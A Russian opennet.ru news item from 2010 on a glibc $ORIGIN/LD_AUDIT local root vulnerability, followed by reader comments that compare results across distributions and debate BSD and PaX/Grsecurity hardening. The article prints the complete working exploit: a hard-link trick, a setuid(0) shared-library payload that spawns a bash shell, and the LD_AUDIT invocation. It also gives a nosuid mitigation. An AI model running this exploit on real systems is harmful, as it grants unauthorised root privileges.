В Glibc обнаружена серьезная уязвимость

19.10.2010 14:47

В системной библиотеке GNU C Library (glibc), являющейся основой большинства Linux-дистрибутивов, обнаружена критическая уязвимость, позволяющая любому локальному пользователю получить привилегии суперпользователя. Проблема вызвана игнорированием в Glibc требования спецификации ELF по запрещению использования текущего пути к исполняемому файлу ($ORIGIN) в процессе динамического связывания программ с идентификатором смены владельца или группы (suid/sgid). Проблема проявляется в конфигурациях, в которых пользователь имеет возможность создавать жесткие ссылки в файловой системе, допускающей наличие suid-файлов.

Уязвимость протестирована в Fedora 13 и RHEL 5 / CentOS 5, другие дистрибутивы судя по всему также подвержены проблеме. Исправления пока недоступны, статус выхода обновлений в различных Linux-дистрибутивах можно наблюдать на следующих страницах: Slackware, Gentoo, Mandriva, openSUSE, CentOS, Fedora, RHEL, Debian, Ubuntu.

Проблема была известна и ранее, но разработчики Glibc считали, что эксплуатировать ее невозможно. Используя режим аудита связывания программ (LD_AUDIT) в ld.so, вкупе с подменой $ORIGIN через создание жесткой ссылки и запуском suid-программы через файловый дескриптор, удалось разработать практический метод атаки. Проверить свою систему на наличие уязвимости можно следующим способом:



Создаем произвольную директорию:

   $ mkdir /tmp/exploit

Привязываем suid-программу жесткой ссылкой в созданную директорию (при выполнении будет изменен $ORIGIN):

   $ ln /bin/ping /tmp/exploit/target

Открываем для исполняемого файла файловый дескриптор:

   $ exec 3< /tmp/exploit/target

Данный файловый дескриптор должен быть виден в пространстве /proc

   $ ls -l /proc/$$/fd/3
   lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

Удаляем ранее созданную директорию

   $ rm -rf /tmp/exploit/

В /proc дескриптор остался, но теперь помечен как удаленный:

   $ ls -l /proc/$$/fd/3
   lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

Заменяем директорию на специально созданный эксплоит (имя директории будет открыто через dlopen):

   $ cat > payload.c
   void __attribute__((constructor)) init()
   {
       setuid(0);
       system("/bin/bash");
   }
   ^D

   $ gcc -w -fPIC -shared -o /tmp/exploit payload.c
   $ ls -l /tmp/exploit
   -rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

Инициируем динамическое связывание и загрузку $ORIGIN через LD_AUDIT и запуск программы по файловому дескриптору в /proc
   
   $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
   sh-4.1# whoami
   root
   sh-4.1# id
   uid=0(root) gid=500(taviso)

В качестве временной меры защиты рекомендуются перемонтировать все доступные сторонним пользователям на запись директории в режиме nosuid (актуально только если suid-файл и доступная на запись директория присутствуют в одном дисковом разделе, например, /tmp или /home являются частью корневого раздела, так как жесткая ссылка не может быть установлена из одного дискового раздела в другой) :


   # mount -o bind /tmp /tmp
   # mount -o remount,bind,nosuid /tmp /tmp

Дополнение: Разработчики из компании Red Hat выпустили патч, устраняющий проблему в Glibc.

исправить +12 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/28338-glibc

Ключевые слова: glibc, security

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (190)

1.1, KERNEL_PANIC (ok), 15:03, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	–4 +/–
Оу, как страшно.

2.7, follow_me (?), 15:37, 19/10/2010 [^] [^^] [^^^] [ответить]	–1 +/–
Покажи свой IP и ты узнаешь как страшно , вернее ты и не заметишь как всё закончится ;)

3.10, arcade (ok), 15:40, 19/10/2010 [^] [^^] [^^^] [ответить]

+/–

> Покажи свой IP и ты узнаешь как страшно , вернее ты
> и не заметишь как всё закончится ;)

Я не замечу. У меня фря и зфс, и такие глупости как один раздел под все файлы я давно изжил. А в разделах в которые пользователь умеет писать нет suid файлов.

Хотя отношение разрабов не радует, давно такая бага в ядре и никто не зопатчил...

4.13, User294 (ok), 15:48, 19/10/2010 [^] [^^] [^^^] [ответить]

+16 +/–

> давно такая бага в ядре и никто не зопатчил...

Epic, epic, epic fail!

Hint #1: может быть, вам следует для начала научиться отличать ядро от glibc, а уже потом умничать начинать? :)
Hint #2: в природе, кстати, есть более чем одна реализация libc. И ряд линухов пользуется ими. Потому что ядро и либцэ - "немного" разные вещи.

4.14, paxuser (?), 15:54, 19/10/2010 [^] [^^] [^^^] [ответить]	–10 +/–
Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD, то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и тем более от OpenBSD. Даже ванильный линукс дальше ушёл (но при этом качество кода ядра у него на уровне второй половины 90-ых - хуже, чем у любой из первой тройки *BSD).

5.22, butcher (ok), 16:15, 19/10/2010 [^] [^^] [^^^] [ответить]	+3 +/–
> Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD, > то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор > находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и > тем более от OpenBSD. Обоснуете? Или так, ваше личное мнение?

6.33, paxuser (?), 16:40, 19/10/2010 [^] [^^] [^^^] [ответить]	+6 +/–
>> Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD, >> то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор >> находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и >> тем более от OpenBSD. > Обоснуете? Или так, ваше личное мнение? Конечно обосную. Во FreeBSD не ни аналогов W^X, ни ASLR, ни PIE, даже возмоность сборки с SSP добавили лишь недавно. В том же CentOS всё это в той или иной мере есть (для юзерспейса). В ванильном линуксе уже реализован аналог W^X, ASLR, поддержка PIE и защита от маппинга памяти по нулевому адресу (с 2008 г.). Не говоря уже о PaX и Grsecurity, где на данный момент реализованы защиты ядра от классов уязвимостей для нескольких аппаратных архитектур, включая аналог W^X для юзерспецса (KERNEXEC), защиту от обращения по указателям на юзерспейс (UDEREF), проверки границ данных при копировании из юзерспейса в ядро (USERCOPY) и т.д.. С полным списком можете ознакомиться сами на grsecurity.net и pax.grsecurity.net + помощь в конфигураторе ядра с PaX и Grsecurity. Датировка первых реализаций PaX - 2001-2002 г. (точнее не вспомню), Grsecurity - 2003-ий год, начала аудита кода ядра и юзерспейса в OpenBSD - 96-ой год, начала включения ProPolice (SSP) - если не ошибаюсь, то 2001-ый год. В 2004-ом году (в сети есть слайды с презентации) в OpenBSD уже были W^X, аналог SSP, StackGhost (продвинутый аналог SSP для Sparc) и ASLR, в 2007-2008 г. была реализована поддержка PIE, в 2009-ом - запрет на памминг нулевого адреса. За NetBSD я не слежу, но пару-тройку лет назад они начали портировать что-то из PaX - гугль в помощь.

7.100, BigHo (?), 23:07, 19/10/2010 [^] [^^] [^^^] [ответить]	+4 +/–
W X - технология, основанная на Х-бит Если так, то она есть - ею можно пользов... большой текст свёрнут, показать

8.104, PereresusNeVlezaetBuggy (ok), 00:06, 20/10/2010 [^] [^^] [^^^] [ответить]	+2 +/–
Не обязательно именно на аппаратный бит Суть именно в принципе 171 либо запис... большой текст свёрнут, показать

9.111, BigHo (?), 01:03, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
В смысле тот, который nX AMD Xd INTEL Как его не назови, а суть одна Без его... большой текст свёрнут, показать

10.112, PereresusNeVlezaetBuggy (ok), 01:42, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
gt оверквотинг удален Тут и возникает дилемма позволять использовать потенциа... большой текст свёрнут, показать

11.118, paxuser (?), 02:19, 20/10/2010 [^] [^^] [^^^] [ответить]	–2 +/–
Вот только в PaX почему-то такой дилеммы не вознает Этот рейс кондишен связа... текст свёрнут, показать

11.120, BigHo (?), 03:19, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Не в курсе был про такое поведение OpenBSD Видимо серьезный тон задает фон кате... большой текст свёрнут, показать

10.114, paxuser (?), 02:06, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Существует как минимум две альтернативных, архитектурно-зависимых реализаций W X... большой текст свёрнут, показать

9.159, User294 (ok), 17:21, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Аппаратная защита надежнее программной Одно дело если проц на уровне железа exc... текст свёрнут, показать

10.161, PereresusNeVlezaetBuggy (ok), 17:38, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Вы бы хоть с предметом ознакомились сначала Ну хотя бы в Википедию заглянули, е... большой текст свёрнут, показать

11.166, User294 (ok), 20:04, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
И правда, про возможность поюзать CS чтобы сделать изоляцию я все-таки пробаклан... большой текст свёрнут, показать

12.169, PereresusNeVlezaetBuggy (ok), 21:08, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
В защищённом режиме 8212 да, CS и SS нельзя произвольно менять Думаю, в расс... большой текст свёрнут, показать

13.170, paxuser (ok), 21:22, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Там в одних тестах на синтетике оверхед был до 36 В других хоть и тестировалис... текст свёрнут, показать

10.163, paxuser (?), 17:41, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Зависит от того, что имеется ввиду под программной и под аппаратной защитой Сов... большой текст свёрнут, показать

11.165, User294 (ok), 19:46, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Все бы ничего, но в таковых средах, типа Java NET PHP whatever почему-то на... большой текст свёрнут, показать

12.168, paxuser (ok), 20:44, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Java NET PHP - это разве маргинальные языки платформы Это угодные индустрии ко... большой текст свёрнут, показать

8.106, paxuser (?), 00:17, 20/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
Возможно, в последних версиях FreeBSD действительно появился аналог W X, но я об... большой текст свёрнут, показать

9.119, BigHo (?), 02:35, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Про то и речь Только с уточнением результата - для AMD64 нормально работает В ... большой текст свёрнут, показать

10.121, paxuser (?), 03:58, 20/10/2010 [^] [^^] [^^^] [ответить]	+2 +/–
gt оверквотинг удален Да нет там никаких принципиальных различий, разница по с... большой текст свёрнут, показать

11.122, paxuser (?), 04:00, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
s Реализация UDEREF вкратце описана Реализация UDEREF для amd64 вкратце описана ... текст свёрнут, показать

11.123, paxuser (?), 04:19, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Более внятное описание USERCOPY из хелпа к конфигу By saying Y here the kernel ... большой текст свёрнут, показать

11.196, taaroa (ok), 13:14, 24/10/2010 [^] [^^] [^^^] [ответить]	+/–
Позвольте Вас дополнить и поправить Slo-Tech Could you please describe in few ... большой текст свёрнут, показать

12.197, paxuser (ok), 22:19, 24/10/2010 [^] [^^] [^^^] [ответить]	+/–
Не совсем так Из интервью с самим pipacs I talked to a few friends about it a... текст свёрнут, показать

8.107, paxuser (?), 00:22, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Сейчас - Hardened Gentoo и CentOS, очень редко другие дистрибутивы Раньше - Fre... текст свёрнут, показать

9.167, User294 (ok), 20:30, 20/10/2010 [^] [^^] [^^^] [ответить]	–1 +/–
Ух ты, кажется я впервые в жизни вижу вменяемого пользователя Генту, способного ... текст свёрнут, показать

5.23, mma (?), 16:16, 19/10/2010 [^] [^^] [^^^] [ответить]	–3 +/–
Что-то вы тут фантазируете. ни по одному из пунктов не согласен. 1)Да фряха значительно более подвержена локальным уязмимосятм но и и спользуется в основном как пакетогонялка, как дескто или интерактивные сервися ее мало 2)каковы критерии оценки качества кода ядер?

6.37, paxuser (?), 16:46, 19/10/2010 [^] [^^] [^^^] [ответить]

+1 +/–

> Что-то вы тут фантазируете. ни по одному из пунктов не согласен.
> 1)Да фряха значительно более подвержена локальным уязмимосятм но и и спользуется в
> основном как пакетогонялка, как дескто или интерактивные сервися ее мало

Она не только локальным подвержена - пользовательские процессы наиболее подвержены удалённым атакам. О пакетогонялках расскажите, например, Сысоеву, и давайте будем рассматривать универсальное применение, а не частные случаи.

> 2)каковы критерии оценки качества кода ядер?

Субъективно-эмпирические, с оглядкой на сложность кода с опубликованными уязвимостями (на сколько просто/сложно было не допустить ошибку, приведшую к уязвимости).

7.39, тигар (ok), 16:54, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
>> Что-то вы тут фантазируете. ни по одному из пунктов не согласен. >> 1)Да фряха значительно более подвержена локальным уязмимосятм но и и спользуется в >> основном как пакетогонялка, как дескто или интерактивные сервися ее мало > Она не только локальным подвержена - пользовательские процессы наиболее подвержены удалённым > атакам. О пакетогонялках расскажите, например, Сысоеву, и давайте будем рассматривать > универсальное применение, а не частные случаи. всеже хотелось бы увидеть пример при помощи которого я удаленно подниму свои привилегии до супер-пользователя, об этом же речь, да?

8.41, paxuser (?), 16:59, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
Нет, не об этом речь Но если взломщик заполучил права обычного пользователя и з... текст свёрнут, показать

9.43, тигар (ok), 17:02, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
дак а fbsd причем или в линаксах еще где-то между вышеописанными шагами чтение... текст свёрнут, показать

10.45, paxuser (?), 17:12, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
В линуксе реализованы механизмы, затрудняющие и или предотвращающие экслпуатацию... текст свёрнут, показать

11.46, paxuser (?), 17:18, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
Для ясности безопасность ванильного линукса лично я оцениваю очень низко там п... текст свёрнут, показать

11.48, тигар (ok), 17:20, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
я пытаюсь понять зачем Вы пишете наборы фраз то PaX и Grsecurity то Она не то... большой текст свёрнут, показать

12.53, paxuser (?), 17:26, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Нет, вы просто хамите и либо не желаете понять, либо не обладаете даже базовым п... большой текст свёрнут, показать

13.58, тигар (ok), 17:45, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
знаете меня больше практика интересует Есть примеры Где посмотреть статисти... текст свёрнут, показать

14.73, paxuser (?), 19:07, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Вас не практика интересует, а некие примеры и статистика, которые в реальном мир... текст свёрнут, показать

15.87, Добрый Аноним (?), 21:25, 19/10/2010 [^] [^^] [^^^] [ответить]	–1 +/–
Все так и имеет место быть, и тем ни менее, в линухах рута получают чаще, чем во... текст свёрнут, показать

16.95, paxuser (?), 22:30, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Чаще или нет - меня, например, вообще не интересует Меня интересует, есть ли сп... текст свёрнут, показать

17.130, Добрый Аноним (?), 11:41, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Ну да, когда куча детей сует свой код в ядро, действительно защищаться нужно, пр... текст свёрнут, показать

16.98, User294 (ok), 22:43, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
Еще один горе-аналитик Как обычно - с ТУПЫМИ ошибками Позор Интересно, а горе... текст свёрнут, показать

17.102, paxuser (?), 23:15, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
На этот счёт есть разные мнения http archives neohapsis com archives dailydav... текст свёрнут, показать

17.131, Добрый Аноним (?), 11:46, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
юзер обиделся забавно можно, с этим кто-то спорит В линуксе, сейчас, дыры н... большой текст свёрнут, показать

18.141, paxuser (?), 14:28, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Только в отличие от винды, у линукса уже есть стабильная, проверенная временем р... текст свёрнут, показать

19.147, Добрый Аноним (?), 14:41, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Вы же в курсе, что в винде тоже постоянно изобретают ловушки для своего кода , ... текст свёрнут, показать

20.155, paxuser (?), 16:44, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Да, и я даже в курсе, у кого они списывают свои ловушки , а также почему у них ... текст свёрнут, показать

21.160, Добрый Аноним (?), 17:25, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Хе, а вы мне уже начинаете нравиться ... текст свёрнут, показать

18.149, User294 (ok), 15:41, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Обиделся На кого Я всего лишь не понимаю зачем надо выступать с горе-аналитик... большой текст свёрнут, показать

19.152, Добрый Аноним (?), 16:36, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Был бы я не добрый сегодня, я бы поругался конечно , но коли я уж добрый, опущ... большой текст свёрнут, показать

19.157, paxuser (?), 17:15, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Я немного вмешаюсь, простите Спам чаще валится с десктопов, потому что их гораз... большой текст свёрнут, показать

20.158, paxuser (?), 17:21, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
s их гораздо меньше их гораздо больше ... текст свёрнут, показать

21.164, User294 (ok), 18:41, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
0xFF Зарегались бы вы, а Тогда вы смогли бы исправлять такое путем редакт... текст свёрнут, показать

16.110, blah (?), 01:01, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
сразу видно высказывание человека, к-ый вообще не шарит в безопасности вам вы... текст свёрнут, показать

15.92, тигар (ok), 22:12, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
погодите, если я понял правильно то Вы предлагаете мне самому доказать Ваши голо... большой текст свёрнут, показать

16.101, paxuser (?), 23:08, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Нет, вы поняли неправильно, вернее, вы занимаетесь казуистикой, наигранно делая ... большой текст свёрнут, показать

13.62, Аноним (62), 18:20, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Вы сами то верите в то что понаписали И какие же это пользовательские процес... текст свёрнут, показать

14.75, paxuser (?), 19:14, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
Не верю, а знаю Любые, которые обрабатывают данные из внешних, потенциально опа... большой текст свёрнут, показать

14.86, User294 (ok), 21:10, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Yet another EPIC FAIL ... текст свёрнут, показать

13.125, kshetragia (ok), 08:10, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Приведите статистику по дырам для Linux и FreeBSD для начала Быть может все эти... текст свёрнут, показать

14.142, paxuser (?), 14:34, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
На статистику по дырам ориентироваться бессмысленно, т к в первую очередь на ... текст свёрнут, показать

15.180, kshetragia (ok), 04:28, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Я про это и говорю Зачем городить огород раньше времени, если по факту дыры л... большой текст свёрнут, показать

16.181, kshetragia (ok), 04:32, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Я не специалист по безопасности, но kern securelevel 2, mount to read only -... текст свёрнут, показать

17.183, paxuser (ok), 06:39, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Озвучьте предложение на Full-Disclosure или DailyDave, оговорите достойное возна... текст свёрнут, показать

16.182, paxuser (ok), 06:31, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Вы говорите совершенно об обратном и вдобавок питаете иллюзии о чистоте кода, ко... большой текст свёрнут, показать

5.30, User294 (ok), 16:37, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
А как оценивалось качество кода? По какой методике?

5.129, QuAzI (ok), 11:17, 20/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
Почему к сожалению Что до FreeBSD, давеча писали про http www opennet ru o... большой текст свёрнут, показать

6.140, paxuser (?), 14:24, 20/10/2010 [^] [^^] [^^^] [ответить]	–1 +/–
Потому что ядро и так дырявое дыркой больше, дыркой меньше Знаете, у меня... большой текст свёрнут, показать

7.153, QuAzI (ok), 16:38, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Почему на второй машине не проявилась на дырявом же ProFTPd Извините, вы выше ... большой текст свёрнут, показать

8.156, paxuser (?), 16:57, 20/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
А я откуда знаю Но уж точно не потому, что между креслом и монитором находитесь... большой текст свёрнут, показать

9.171, QuAzI (ok), 23:00, 20/10/2010 [^] [^^] [^^^] [ответить]	–2 +/–
Неа, бессовестно хамите тут как раз Вы, но очень уж уверены что именно Вы самый ... большой текст свёрнут, показать

10.172, PereresusNeVlezaetBuggy (ok), 23:51, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
Как ламер позорный, позволю себе всё же заметить, что тов paxuser 8212 дейст... большой текст свёрнут, показать

11.176, QuAzI (ok), 01:10, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Пардон Человек тут на пол темы расписал, как хорош PaX и патчи для linux на осн... текст свёрнут, показать

12.178, paxuser (ok), 01:31, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Не пардон Вы до сих пор считаете, что я что-то расписывал в категориях хорошо-п... большой текст свёрнут, показать

13.184, QuAzI (ok), 08:27, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
А ничего что Grsecurity основан на PaX Это всё равно что написать PaX вместе с... текст свёрнут, показать

14.186, paxuser (ok), 09:14, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
зеваю Очередная несусветная глупость, уже даже почти немного смешная Логики п... большой текст свёрнут, показать

10.173, paxuser (ok), 00:17, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Где конкретно я хамил Это ваши фантазии и трусливая попытка прировнять надуманн... большой текст свёрнут, показать

11.174, QuAzI (ok), 00:45, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
А где конкретно я хамил, конкретно Вам до вашего треда о том что я хам У меня т... текст свёрнут, показать

12.175, paxuser (ok), 01:06, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
вы выше _орали_ про аппаратную реализацию, а аналоги использовать уже другой ... большой текст свёрнут, показать

13.177, QuAzI (ok), 01:27, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
_орали_ - а как ещё назвать тучу постов выше _давайте, расхвалите мне её тут_- ... большой текст свёрнут, показать

14.179, paxuser (ok), 01:51, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Высказывал мнение, аргументы, контраргументы, давал пояснения, повторял для особ... большой текст свёрнут, показать

15.185, QuAzI (ok), 08:30, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Не похоже, ой не похоже ... текст свёрнут, показать

16.187, paxuser (ok), 09:14, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Ну вам виднее, конечно ... текст свёрнут, показать

17.188, QuAzI (ok), 16:21, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Можно немножко откровения Почему у Вас PaX даже в никнейме ... текст свёрнут, показать

18.189, paxuser (ok), 17:58, 21/10/2010 [^] [^^] [^^^] [ответить]	+/–
Это скорее подпись, которая звучит проще, чем grsecuser или grsecurityuser, а су... текст свёрнут, показать

3.19, Аноним (-), 16:08, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
>позволяющая любому _локальному_ пользователю получить привилегии суперпользователя вот так

3.51, ы (?), 17:25, 19/10/2010 [^] [^^] [^^^] [ответить]	–1 +/–
>Покажи свой IP и ты узнаешь как страшно , вернее ты и не заметишь как всё закончится ;) Сетка класса А: 127.0.0.0/8, выбери любой из 16'777'214 айпишников.

3.81, Аноним2 (?), 19:41, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Твои пинги я действительно заметить не успею.

....большая нить свёрнута, показать (91)

1.5, V (??), 15:33, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 Inconsistency detected by ld.so: dl-open.c: 266: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed! Connection to board-gw closed. не судьба..

2.25, h4tr3d (ok), 16:24, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Аналогично, это в консольке, xterm просто закрылся. может shell тоже имеет значение?

3.32, Rain (??), 16:40, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Нет, перенаправь вывод ошибок в файл и увидишь то же самое

4.151, User294 (ok), 15:49, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
> Нет, перенаправь вывод ошибок в файл и увидишь то же самое Можно просто шелл в шелле запустить. Когда чайлдовый шелл помрет, вы вывалитесь в парент, сообщение о том почему сдох чайлд ессно будет видно. ИМХО так проще - ошибка вываливается в том же месте, не надо ни в каких файлах копаться где-то сбоку.

1.6, Аноним (-), 15:36, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+2 +/–
на шаге $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 шелл упал дистр OpenSUSE 11.3

2.83, killer1804 (??), 20:12, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
[user0@homelinux ~]$ uname -a Linux homelinux 2.6.35-ARCH .... шел упал. аналогично

1.8, Egres (ok), 15:38, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
$ mkdir /tmp/exploit $ ln /bin/ping /tmp/exploit/target ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется Ubuntu 10.10, /tmp не является отдельной fs

2.49, tallman (?), 17:24, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
и в логе такая штука $ tail -1 /var/log/messages Oct 19 16:17:21 machine kernel: [226597.124722] non-accessible hardlink creation was attempted by: ln (fsuid 1000) Даже как-то скучно быть неподверженным..

1.9, paxuser (?), 15:40, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Кстати, в Grsecurity по умолчанию включены запреты пользователям на создание хардлинков на чужие файлы.

1.11, Аноним (-), 15:40, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Исправления нет - как так?!

2.28, Andrey Mitrofanov (?), 16:36, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Заголовок, "обнаружена". Вопросы?

1.12, bircoph (?), 15:46, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
В Gentoo у меня FEATURES="sfperms", что ставит права go-r на все suid файлы. Так что эксплойт не работает и я в безопасности )).

2.15, paxuser (?), 15:57, 19/10/2010 [^] [^^] [^^^] [ответить]	–2 +/–
> В Gentoo у меня FEATURES="sfperms", что ставит права go-r на все suid > файлы. > Так что эксплойт не работает и я в безопасности )). У вас в Gentoo месяцами обновления безопасности не выпускаются - посмотрите хотя бы на даты в ChangeLog MySQL в основном дереве Portage. Уровень защищённости приемлемый только в полноценном Hardened.

3.20, Аноним (-), 16:11, 19/10/2010 [^] [^^] [^^^] [ответить]	+2 +/–
emerge --sync по чаще делай

4.24, paxuser (?), 16:20, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
> emerge --sync по чаще делай Между прочим, emerge --sync подвержен MitM-атакам. Давно перешёл на emerge-webrsync вкупе с webrsync-gpg FEATURE. Нахамить-то любой может, вы для начала попробуйте осилить анализ содержимого /usr/portage/dev-db/mysql/ChangeLog с датой публикации бюллитеней безопасности и выходом исправленных версий MySQL.

5.136, anonymous (??), 13:40, 20/10/2010 [^] [^^] [^^^] [ответить]	–1 +/–
Паранойя головного мозга во все поля.

6.143, paxuser (?), 14:36, 20/10/2010 [^] [^^] [^^^] [ответить]	+/–
> Паранойя головного мозга во все поля. Блажен, кто верует, знание же преумножает скорбь. :)

3.34, bircoph (?), 16:43, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
Я mysql не пользуюсь, так что меня это не волнует. GLSA по критическим уязвимостям быстро выходят.

4.38, paxuser (?), 16:49, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
> Я mysql не пользуюсь, так что меня это не волнует. GLSA по > критическим уязвимостям быстро выходят. О скорости выхода GLSA - это вы на #gentoo-security расскажите, чтобы разработчики тоже порадовались: проблема-то надуманная, оказывается.

4.77, maxkit (ok), 19:18, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
> Я mysql не пользуюсь Ну и аргументы.

1.16, Толстый (ok), 16:02, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
на CentOS 5 сработало!

1.18, Аноним (-), 16:03, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	+/–
на третьем шаге уже не дает $ exec 3 < /tmp/exploit/target bash: /tmp/exploit/target: Отказано в доступе

2.21, Вова (?), 16:12, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
> на третьем шаге уже не дает > $ exec 3 < /tmp/exploit/target > bash: /tmp/exploit/target: Отказано в доступе +1, на двух гентах пытался, дома и на работе

3.82, ozs (ok), 20:02, 19/10/2010 [^] [^^] [^^^] [ответить]	+1 +/–
**@:~$ mkdir /tmp/exploit *@:~$ ln /bin/ping /tmp/exploit/target *@*:~$ exec 3< /tmp/exploit/target bash: /tmp/exploit/target: Отказано в доступе На Slackware 13.1

4.96, Ytch (?), 22:37, 19/10/2010 [^] [^^] [^^^] [ответить]	+/–
По умолчанию на Zenwalk 6.4 аналогично. Если на /bin/ping рутом дать права на чтение и проделать все еще раз, то закрывается терминал как писали выше.

1.26, svchost (ok), 16:29, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]	–2 +/–
Насквозь дырявое ядро, если при уязвимости в какой-нибудь библиотеке можно заполучить root. Такое впечатление, что в оффтопике ядро вылизано настолько, что там нет никаких уязвимостей. По крайней мере я не знаю способов заполучить привилегии админа в давно вышедшей XP SP3 не говоря уже о семерке. Сильно не пинайте, но иногда такие мысли возникают.

2.31, Аноним (-), 16:38, 19/10/2010 [^] [^^] [^^^] [ответить]

+/–

> Насквозь дырявое ядро, если при уязвимости в какой-нибудь библиотеке можно заполучить root. Такое впечатление, что в оффтопике ядро вылизано настолько, что там нет никаких уязвимостей. По крайней мере я не знаю способов заполучить привилегии админа в давно вышедшей XP SP3 не говоря уже о семерке.

Сильно не пинайте, но иногда такие мысли возникают.

